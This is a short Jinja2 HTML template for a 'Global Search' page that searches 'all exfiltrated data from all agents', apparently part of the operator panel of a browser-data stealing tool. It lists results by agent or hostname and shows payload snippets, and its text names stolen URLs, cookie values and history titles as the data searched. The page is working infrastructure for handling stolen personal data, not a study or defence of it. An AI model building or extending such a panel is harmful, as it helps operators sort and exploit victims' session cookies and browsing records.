{% extends "base.html" %} {% block title %}Global Search{% endblock %} {% block content %}

Global Search

Search across all exfiltrated data from all agents

{% if results %} {{ results|length }} result{{ 's' if results|length != 1 else '' }} found {% endif %}
{% if query %} {% if results %}
{% for r in results %}
{{ r.data_type }} {{ r.hostname or r.agent_id }} {{ r.created_at }}
{{ r.payload[:500] }}{% if r.payload and r.payload|length > 500 %}...{% endif %}
{% endfor %}
{% else %}

No results for "{{ query }}"

Try a different keyword or data type filter

{% endif %} {% else %}

Enter a keyword to search

Searches across all payload data — URLs, cookie values, history titles, and more

{% endif %}
{% endblock %}